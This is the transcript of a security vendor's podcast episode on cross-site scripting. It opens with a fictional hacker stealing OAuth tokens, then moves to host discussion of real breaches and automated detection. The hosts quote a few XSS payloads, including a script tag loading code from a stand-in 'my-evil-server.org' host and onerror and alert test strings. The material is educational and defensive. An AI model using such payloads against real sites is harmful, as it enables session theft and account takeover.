Podcasts

Episode 1: Hot Cross-Site Fun

Cross-site scripting (XSS) is one of the oldest web vulnerability types, having been born the day that browsers added scripting support. While sometimes dismissed as a low-risk vulnerability, XSS is still a very real threat that can have serious consequences on the server as well as client side, especially in these days of full-stack JavaScript applications.
 
In this episode, Frank Catucci and Dan Murphy talk about the origins of cross-site scripting, some high-profile attacks, and best practices to test for and also prevent XSS in applications. In the fiction segment, Mallory the hacker uses XSS to inject script into an old and vulnerable leaderboard server—but she has to work hard to get around the WAF first.

Hosted by: Frank Catucci, Dan Murphy
August 20, 2024

Transcript

Episode One: Hot Cross-Site Fun

Mallory didn’t really need the z-bucks—not really. She had found a new game, emerging from the ashes of the old one, more exciting than any she had played before. She had barely touched her tonkotsu ramen. She blinked, looking up from her laptop, and noticed that the noodle bar was almost empty. She’d have to leave soon, but she was so close. She had an idea—one more thing to try. In her experience, it was always the side door that didn’t have the lock.

The server was old, at least a decade back, judging from the hostname. Some sort of public-facing leaderboard for a game long since abandoned—dusty, unloved, and absolutely perfect. She adjusted the angle of her laptop. There was clearly a web application firewall (WAF) between her and her target. It was signature-based, with a library of tricks that it would watch out for and individually block. But if she put the right moves into the URL, jinked left when it went right, she could work around it.

Maybe for the tenth time tonight, she told herself that she should really automate this. She had found that she could reflect the text she typed into the site’s search bar into the source code of the page, but the WAF was already one step ahead, anticipating her and blocking her. Steam no longer rose from the ramen. On a whim, she added an unusual bit of JavaScript—a mouse hover handler that would pop up an alert box. The payload sailed across the net inside her HTTP GET request, and she inhaled sharply, her heart rate spiking.

There, before her in a gray popup, was an alert box containing her attack payload. The onmouseover event had invoked an alert with a string that had no business being in the application she was targeting. Her heart began to pound. The site with the vulnerability wasn’t important, but its domain name was. As a subdomain, it was trusted with access to all of the single sign-on persisted state information—the cookies that targeted the main page.

Shinobi was streaming the game as usual. He had more than 15 million subscribers. She hopped onto his stream and started spamming a URL—a special link that redirected after login to the site with the XSS, the cross-site scripting payload. The chat wouldn’t take the full URL, so she had to finesse it, change a few characters here and there. It was almost too easy to talk the gullible audience into an infinite z-bucks hack. The link contained a script tag with a source pointing back to an EC2 instance that Mallory had set up with a hostile bit of JavaScript—a kind of Trojan horse that, once invited past the walls of the webpage’s secure boundary, could unpack and execute any JavaScript code she wanted. And what she wanted was the OAuth2 credentials—the keys to the social media accounts of everyone watching the stream who was gullible enough to click.

She tailed the logs of her server, looking for the GET requests that included the base64-encoded JSON Web Token (JWT, pronounced “jot”). It worked. It actually worked. The tokens poured in faster than her terminal could keep up with, multiple lines of green text spilling over her darkened screen so fast the characters turned into a blur. She had done it. She had won.

In the real world, the neon lights in the ramen bar turned off, leaving her face illuminated by only the pale glow of the laptop. Her victory still danced in the LED’s back glow. Someone was yelling at her—something about closing in ten minutes. She hadn’t been listening, too wrapped up in her own world. But she had done it. She had solved the game within the game. Her nerves were pure electricity as she smiled a huge grin.

She had won… chicken dinner.

Dan Murphy: Welcome to our first episode of AppSec Serialized, the podcast where we talk about web application and API security. My name is Dan Murphy, and I’m the Chief Architect here at Invicti Security.

Frank Catucci: And my name is Frank Catucci, and I’m the CTO and Head of Research here at Invicti Security. 

Dan: As you heard in that intro story, cross-site scripting is very, very real, and today we’re going to dive a bit deeper into it. Frank, my first question is, what’s in a name? Why is cross-site scripting (XSS) called cross-site?

Frank: Yeah, it’s an interesting question that has a lot to do with the history of cross-site scripting. This is a vulnerability that goes back a number of years. If you look at how applications and websites were designed in the past, everything essentially happened on one site. Cross-site scripting comes into play when you load something in an iframe or from a different site, or when you run a script via a different site. You’re essentially crossing the boundaries of one site to another to exploit this vulnerability. That’s my take on the history of the name and how it’s evolved to what it is today.

Dan: Yeah, totally. I think the first instances of this, like with the Myspace worm, started a lot of this stuff. Originally, these involved tiny, invisible iframes with scripts that came from another site, from cross-origins. Those hostile scripts were able to run on the page and cause a lot of harm. 

Frank: Dan, I have a question for you. A lot of people often say, “Oh, it’s just cross-site scripting. I’m not sure it’s still relevant as a severe vulnerability in my web application.” Let’s break this down. What’s the worst thing that can happen with cross-site scripting?

Dan: There are a few different ways to think about it. Cross-site scripting is about evaluating untrusted JavaScript code in the front end of your apps. In terms of your threat model, anything that someone could do through your UI can be achieved if hostile code is executing in the front end. Back in the day, it was easy to say, “Oh, that’s just the UI; it doesn’t matter that much.” But with everything being controlled through a web UI nowadays, anything you can do there can be done by malicious code.

Technically, you’re executing code that has access to the full Document Object Model (DOM). It can rewrite things and exfiltrate data. For example, you could insert a silent image tag that sends your cookies, which are associated with the site, to a hostile third party. That third party could then log in to your site, banking account, or transfer funds. There’s a lot of power in this vulnerability. You can intercept APIs, steal data, and cause significant damage. Code can click buttons, drive processes, and exfiltrate sensitive information.

In fact, Frank, that’s a good question. What’s your favorite example when you talk to people about cross-site scripting, where damage has been done? 

Frank: We have plenty of examples to choose from. I’ll give you one of my personal favorites due to its impact. I’d love to hear yours as well. 

This is relatively recent, around 2018. British Airways was attacked by Magecart. They exploited a cross-site scripting vulnerability in a JavaScript library used on the British Airways site. With that vulnerability, they were able to send customer data to a malicious server using a domain name similar to British Airways. They skimmed ticketing, credit card, and personal information from almost 400,000 booking transactions. We’re not talking about one or two; we’re talking about almost 400,000 live customer bookings with credit cards, corporate cards, mile transactions, everything being processed in those ticket purchases before the breach was discovered.

This is a perfect example of how a cross-site scripting vulnerability could be exploited and be detrimental to a company. We’re talking about 400,000 credit cards on a British Airways site, PCI violations, breach notifications, identity monitoring, etc. If this were a smaller entity, it could have ended the company. Super impactful and expensive for the company.

So that was just one example, probably one of my favorites just because of the breadth and depth and impact of the attack. But, Dan, you give me an example—what’s one of your favorite cross-site scripting examples?

Dan: So, one story I always love to talk about, and I’ve used it when interviewing engineers over the years, is by a gentleman named Sam Curry. Cross-site scripting is ultimately about not having validation. It’s about putting something into a web page that has no business being there. This gentleman, he got a Tesla, and when you have a Tesla, the app allows you to name your car. 

Now, most people are going to name it something innocuous like “Bob the car” or something like that. But in this case, what this guy did was he named it something like <script src="http://my-evil-server.org/js">. Basically, he was trying to pull in some code from somewhere on the internet, and he named it that. Nothing happened at first because it was protected, so he thought nothing of it.

But then, months later, he was driving on the highway and got a crack in his windshield. He used the app to request a replacement, and what happened was the app sent the name of the car—which again was this HTML tag trying to pull in content from another location—through a labyrinth of different paths to a back-end system at Tesla that was processing these claims. Suddenly, he found that his dumb name for his car was being pulled into an internal web page firewalled off in some internal Tesla app. 

What it was doing now was allowing him to inject code from this web server that he controlled into the internal app, and he was able to do anything with access to the DOM. He could see what the app was doing, and it turned out this app was processing geolocation data to show where someone doing a service request would need to drive to replace the windshield on a cracked Tesla. It showed a picture of his car, its location, and he also noticed that because the cross-site scripting was executing in the context of that web page, it was easy to look at the document.location property and see, “Hey, this is for cracked windshield request SL1 123.” 

Well he was able to change that to 124 and found somebody else’s vehicle, then to 125, and so on. You can extrapolate from there—this simple trick of naming something inside an app with active code ended up allowing him to track the location of every single Model S out there, to see where it was on the map. It’s humorous because the vector is an input that goes into a web app that ends up executing not on a publicly accessible system, but something in the back that should be secure. There are tons of internal web apps that don’t have the same internal security standards that externally-facing systems do, but this one became active, and he was able to get some pretty juicy stuff out of it. 

It’s a great story. Are there different types of cross-site scripting? What flavors of that particular vulnerability can I get?

Frank: That’s an excellent question. Some people will say there are a couple of different flavors of cross-site scripting. Some will say there are upwards of three or four types. I break these down into two major categories. One could argue that DOM-based XSS is just a type of reflected and not a stored type of XSS since it occurs strictly in the DOM. So, I’m going to focus on the two main categories. One would be reflected, and the other would be stored. You’ll often hear these referred to as either reflective, non-persistent, or just reflected and stored or reflected and persistent. But I break it down into these two categories. 

Reflected cross-site scripting is when the user input is returned by an app, either in an error message, a search result, or some other type of code or script that’s being run as part of a search or as part of data that is rendered specifically in the browser on the DOM side. It’s done in a manner that reflects within that session, and that could have a multitude of impacts. Having a script that you’re allowed to run from a source that gets replayed or displayed on that application can do things like clicking buttons, creating users, or causing other unintended actions. 

Let’s say you’re logged in as an admin, and you’re vulnerable to cross-site scripting. You might not realize it, but you’ve just created a new admin—except it’s a nefarious user. So, there are tons of things that can occur there. That’s basically what I look at beyond the simple alert with JavaScript as a test. But that’s reflected cross-site scripting.

The other type is usually more serious, and I sometimes think, “They call this stored XSS, but isn’t this really a type of injection?” Stored XSS is when any nefarious input is stored on the actual host or the site itself. This can be stored anywhere—it could be stored in a database, a comment field, or a review field (which is one of my favorites, right? Let’s leave a review with a payload). 

What happens there is that this vulnerability is not only taking advantage of the user and the session it’s in front of, but it can reach and impact every user or session that visits that database, comment field, or message field. That payload is permanently stored as part of that database and replayed as many times as it’s accessed until it’s removed. In my eyes, this is definitely more impactful as a whole. We could paint that in a few different brushes, but those are the two main categories that I usually use to describe cross-site scripting.

Dan: That persistent one is tricky, right? Because it spreads. It might be injected through one vector and then affect somebody else. Particularly when you’re dealing with exfiltration or other things like in the story we discussed earlier. That’s an example of persistent XSS.

Frank: Yeah, it’s a perfect example and really shows the impact that XSS can have. One thing we also get asked a lot is, “Look, cross-site scripting occurs. We update our sites and our APIs”—well, not APIs so much in this example—”but we update our web applications, and we update our functionality almost hourly, some daily, some weekly, etc. But there are frequent updates where these kinds of vulnerabilities can sneak in.” 

We have a lot of clients who ask, “How can we automate XSS detection so that it’s constantly being tested and monitored to make sure we’re not having these vulnerabilities in production environments without us knowing?” So, Dan, in your opinion, what are one or two ways that this could be automated in a way that’s not a manual task for someone to find these things and fix them?

Dan: That’s a good question. The answer is, you know, it’s just like three simple for-loops, right? For each website that you have, for each page on that website, and for each parameter on that website, try some XSS. And that’s very reductionist; it doesn’t really work like that in practice, but it’s a good model for understanding this stuff. 

If you wanted to exploit cross-site scripting manually, there are some great tools out there. There’s the Google Firing Range, and all sorts of test apps that you can use. The simplest version is you find a parameter that says, “This is where you put your name,” and you’re hoping someone just trusted that blindly. You’re hoping that someone took that name parameter from the user and put it into the HTML. 

Much like our Tesla app example from before, say your name was something like <img src=x onerror="someJavascript()">. What an automated test tool is going to do is it’s not going to get tired; it’s going to exhaustively find every single parameter, doing the sort of work that a manual penetration tester would probably get pretty tired of after the 10th value inside a JSON post of some fetch data.

So, they’re not going to look, but an automated tool will go through each of these parameters. What it tries to do is basically send different types of payloads to find different parts of the system, places where you can reflect content into the page. The actual payload you send differs based on where inside the page you’re able to inject traffic. If you’re just raw inside the HTML, you could throw in a script tag, but often it’s more subtle. You might have an injection context where it’s going into the source of an iframe, where you might have to put just a particular URL to an off-site machine that has your payload. Or you might have to close one tag and start something new. So, there are a lot of these different flavors.

Really, what we do is introduce yet another loop that says for each recipe in the cookbook of different types of attacks, try one of these things. But what’s cool about cross-site scripting is that you can detect it. You can make sure that it’s really being exploited. Most of these automated tools are driving a browser, crawling through every single possible site and page, and at the end of the day, they’re trying to get code to work. 

Because these browsers are instrumented, we can register a function, almost like a smoke detector, that says, “Hey, if you manage to call this bit of JavaScript, it’s an innocuous function that stands in for doing something really nasty.” So instead of stealing all your creds and sending your cookies off to some random site on the internet, we call a function that proves you were able to actually execute your own code. So you have something that’s registered inside there that will only be called if all the stars align and you call it for real and with an instrumented browser, you can detect that you actually triggered it. The nice thing is that you can then report with confidence, saying, “Hey, this is something you really have to take a look at because it’s not that this could happen, it’s that this did happen.”

Frank: Yeah, and using benign payloads and being able to substitute that for a malicious payload is not too difficult.

Dan: Oh yeah, in the real world, people will often exploit these things by doing something like <script>alert(1)</script>. What that does is it pops up a dialog box, but someone can get really excited when they see that pop-up because that’s the stand-in for doing anything you want.

Frank: Yeah, I can basically execute my code on your site and have it do whatever I need it to do. There’s a lot of creativity that comes in there too, right? The creativity of things like using an image source tag or different types of HTML recipes.

Dan: Indeed, we have tons of these things that we’ll go through to try to find out what can get past the filters, what can make its way through, and provably be real XSS.

So, Frank, I think that’s all we have time for today. This is our first episode—hopefully, several more to come. But I just want to say, hey, thanks. It’s always a blast sitting down and talking shop with you.

Frank: You as well, Dan. I always appreciate the conversation.

Dan: Yeah, thanks. And thank you all for listening. Have a great day!

Credits

COMING SOON

Episode 4: Another Code Brick in the Wall

In this episode, Frank Catucci and Dan Murphy go into supply-chain security and look at several high-profile breaches caused by insecure components and dependencies. In the fiction segment, Alice the head dev realizes that vulnerable library the CISO is asking about is used in lots and lots of places all over the org…

Recent Podcasts

Build your resistance to threats. And save hundreds of hours each month.

Get a demo See how it works